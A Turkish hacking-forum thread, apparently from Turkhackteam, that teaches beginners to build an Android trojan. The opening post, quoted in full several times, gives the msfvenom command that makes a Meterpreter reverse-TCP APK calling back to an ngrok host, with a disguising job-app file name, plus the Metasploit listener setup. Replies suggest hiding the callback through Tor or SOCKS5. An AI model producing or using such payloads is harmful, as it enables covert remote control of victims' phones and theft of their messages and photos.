dış ağ trojan nasıl oluşturulur & trojan nedir

sefilbilo23

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22

YENİ BAŞLİYANLARA ÖZEL EĞİTİM !!!


TROJAN NEDİR : Trojan meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Genellikle siber suçlular tarafından gizli verileri çalmak, kullanıcılara karşı casusluk yapmak ve sistemlere izinsiz erişim elde etmek için kullanılır.


TROJAN NASIL ENGELLENİR ? : trojan genelikle internet ortamlardan bulaşır trojan önlemek için veya gizli bilgilerinizi çalınmaması için internet bağlantısını kesmeniz lazım ve format atmanız gerek eğer ki hemen kontrol etmeseniz verilerinizi çalıp özel mesajınızı ve galerinize sızılabilir ve ordan da sizi yıllarca takip edebilirler


TROJAN NASIL BULAŞIR : Trojan virüsü genellikle hileli programlar aracılığı ile bilgisayar sisteminize girerler. Bir web sitesindeki cazip görünen bir fotoğraf ve/veya linke tıkladığınızda virüs bilgisayarınıza sızabilir. Özellikle yasa dışı bannerlar, içeriğinde, trojan virüsü barındırmaktadır.


TROJAN NASIL OLUŞUR ? ( GÖRSEL ANLATIM )

öncelikle kali linux acalım daha sonra cd Masaüstü yapalım eğer ngrok kurdusanız masaüstüne alın

daha sonra yaptığım gibi http yerine tcp yapiyoruz ngroku çalıştırıyoruz


gördüğünüz gibi LPORT LHOST NGROK İLE AYNI burda diyoruz ki ngrok bana tcp portu ver oda olur ABİ verim diyor

bunu yapınca apk artık dinlemeye almaya çalışcaz bunun için MSFCONSOLE ÇALIŞTIRCAZ

çalıştırmadan ngrok kapatmayın eğer hata alırsanız baştan aşağa tekrar uygulamanız lazım

ve son olarak da dinlemeye alacağımız komutları giriyoruz ve run veya exploit yapıp HELP komutu çalıştırın ve hangi komutu çalıştırmak isterseniz kopyala yapıştırın






KOMUT VE KODLARI
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=12426 R > İŞbul.apk

MSFCONSOLE
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > set LHOST 127.0.0.1














 
Ç

Ç1nk0

Üye
6 Tem 2023
77
52
sefilbilo23' Alıntı:
yeni başliyanlara özel demişim yanlız :(
Genişletmek için tıkla ...
Yeni başlayanlar eski yöntemleri değilde yeni yöntemleri öğrense daha iyi olur. Biz bunu öğrendik zamanında, onlarda öğrensin demek saçma bence. Mesela ftp serverlar nasıl hacklenir diye bir tane konu açılabilir, bilmiyorsanız, araştırıp öğrenebilirsiniz, sonrasında kendiniz foruma sunarsınız.
 
T

tamam ağa

Uzman üye
7 Haz 2023
1,534
13
876
ngrok stabil değil.
ayrıca her kapanıp açıldığında yanılmıyorsam adresi değişiyor ve para istiyor.

bunun yerine alternatif port yönlendirmesi yapmanız gerek.

misal tor üzerinden bağlantı yönlendirilebilirsiniz SOCK5 protokolü sayenizde port açmadan web sunucusu kurulabiliyor trojanı yine aynı şekilde SOCK5 protokolü ile web sunucusuna yönlendirilebilir.

PHP de ve python web de socket kütüphanesi mevcut


ama yinede emek vermişsin eline sağlık

@sefilbilo23
 
Son düzenleme:
sefilbilo23

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22
Ç1nk0' Alıntı:
Yeni başlayanlar eski yöntemleri değilde yeni yöntemleri öğrense daha iyi olur. Biz bunu öğrendik zamanında, onlarda öğrensin demek saçma bence. Mesela ftp serverlar nasıl hacklenir diye bir tane konu açılabilir, bilmiyorsanız, araştırıp öğrenebilirsiniz, sonrasında kendiniz foruma sunarsınız.
Genişletmek için tıkla ...
olur da amacım yeni başliyanlara içindi :=)

tamam ağa' Alıntı:
ngrok stabil değil.
ayrıca her kapanıp açıldığında yanılmıyorsam adresi değişiyor ve para istiyor.

bunun yerine alternatif port yönlendirmesi yapmanız gerek.

misal tor üzerinden bağlantı yönlendirilebilirsiniz SOCK5 protokolü sayenizde port açmadan web sunucusu kurulabiliyor trojanı yine aynı şekilde SOCK5 protokolü ile web sunucusuna yönlendirilebilir.

PHP de ve python web de socket kütüphanesi mevcut


ama yinede emek vermişsin eline sağlık

@sefilbilo23
Genişletmek için tıkla ...
evet bunu bilmiyenler de olur en kolay yöntemi kullandım başka yolları da kullanırdım ama en kolay yol bu olduğu için kullandım yoksa modem de sabit internet veya duckdus gibi yerler de acardım
 
Butcherb3y

Butcherb3y

Uzman üye
1 Eyl 2022
1,617
7
1,199
Anıtkabir
sefilbilo23' Alıntı:

YENİ BAŞLİYANLARA ÖZEL EĞİTİM !!!


TROJAN NEDİR : Trojan meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Genellikle siber suçlular tarafından gizli verileri çalmak, kullanıcılara karşı casusluk yapmak ve sistemlere izinsiz erişim elde etmek için kullanılır.


TROJAN NASIL ENGELLENİR ? : trojan genelikle internet ortamlardan bulaşır trojan önlemek için veya gizli bilgilerinizi çalınmaması için internet bağlantısını kesmeniz lazım ve format atmanız gerek eğer ki hemen kontrol etmeseniz verilerinizi çalıp özel mesajınızı ve galerinize sızılabilir ve ordan da sizi yıllarca takip edebilirler


TROJAN NASIL BULAŞIR : Trojan virüsü genellikle hileli programlar aracılığı ile bilgisayar sisteminize girerler. Bir web sitesindeki cazip görünen bir fotoğraf ve/veya linke tıkladığınızda virüs bilgisayarınıza sızabilir. Özellikle yasa dışı bannerlar, içeriğinde, trojan virüsü barındırmaktadır.


TROJAN NASIL OLUŞUR ? ( GÖRSEL ANLATIM )

öncelikle kali linux acalım daha sonra cd Masaüstü yapalım eğer ngrok kurdusanız masaüstüne alın

daha sonra yaptığım gibi http yerine tcp yapiyoruz ngroku çalıştırıyoruz


gördüğünüz gibi LPORT LHOST NGROK İLE AYNI burda diyoruz ki ngrok bana tcp portu ver oda olur ABİ verim diyor

bunu yapınca apk artık dinlemeye almaya çalışcaz bunun için MSFCONSOLE ÇALIŞTIRCAZ

çalıştırmadan ngrok kapatmayın eğer hata alırsanız baştan aşağa tekrar uygulamanız lazım

ve son olarak da dinlemeye alacağımız komutları giriyoruz ve run veya exploit yapıp HELP komutu çalıştırın ve hangi komutu çalıştırmak isterseniz kopyala yapıştırın






KOMUT VE KODLARI
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=12426 R > İŞbul.apk

MSFCONSOLE
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > set LHOST 127.0.0.1














Genişletmek için tıkla ...
Elinize sağlık
 
rootibo

rootibo

Kıdemli Üye
13 Mar 2023
2,168
12
1,460
sefilbilo23' Alıntı:

YENİ BAŞLİYANLARA ÖZEL EĞİTİM !!!


TROJAN NEDİR : Trojan meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Genellikle siber suçlular tarafından gizli verileri çalmak, kullanıcılara karşı casusluk yapmak ve sistemlere izinsiz erişim elde etmek için kullanılır.


TROJAN NASIL ENGELLENİR ? : trojan genelikle internet ortamlardan bulaşır trojan önlemek için veya gizli bilgilerinizi çalınmaması için internet bağlantısını kesmeniz lazım ve format atmanız gerek eğer ki hemen kontrol etmeseniz verilerinizi çalıp özel mesajınızı ve galerinize sızılabilir ve ordan da sizi yıllarca takip edebilirler


TROJAN NASIL BULAŞIR : Trojan virüsü genellikle hileli programlar aracılığı ile bilgisayar sisteminize girerler. Bir web sitesindeki cazip görünen bir fotoğraf ve/veya linke tıkladığınızda virüs bilgisayarınıza sızabilir. Özellikle yasa dışı bannerlar, içeriğinde, trojan virüsü barındırmaktadır.


TROJAN NASIL OLUŞUR ? ( GÖRSEL ANLATIM )

öncelikle kali linux acalım daha sonra cd Masaüstü yapalım eğer ngrok kurdusanız masaüstüne alın

daha sonra yaptığım gibi http yerine tcp yapiyoruz ngroku çalıştırıyoruz


gördüğünüz gibi LPORT LHOST NGROK İLE AYNI burda diyoruz ki ngrok bana tcp portu ver oda olur ABİ verim diyor

bunu yapınca apk artık dinlemeye almaya çalışcaz bunun için MSFCONSOLE ÇALIŞTIRCAZ

çalıştırmadan ngrok kapatmayın eğer hata alırsanız baştan aşağa tekrar uygulamanız lazım

ve son olarak da dinlemeye alacağımız komutları giriyoruz ve run veya exploit yapıp HELP komutu çalıştırın ve hangi komutu çalıştırmak isterseniz kopyala yapıştırın






KOMUT VE KODLARI
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=12426 R > İŞbul.apk

MSFCONSOLE
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > set LHOST 127.0.0.1














Genişletmek için tıkla ...
Elinize saglik ancak boyle payloadlar eskide kaldi yeni seyler ogrenme vaktidir ama yeni arkadaslar icin faydali konu
 
sefilbilo23

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22
rootibo' Alıntı:
Elinize saglik ancak boyle payloadlar eskide kaldi yeni seyler ogrenme vaktidir ama yeni arkadaslar icin faydali konu
Genişletmek için tıkla ...
evet bilerek yaptım daha iyisini beceremezler eskiden herkes böyledi yavaş yavaş öğrenirler tipki web hacklerken shll kullandığımız gibi :)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.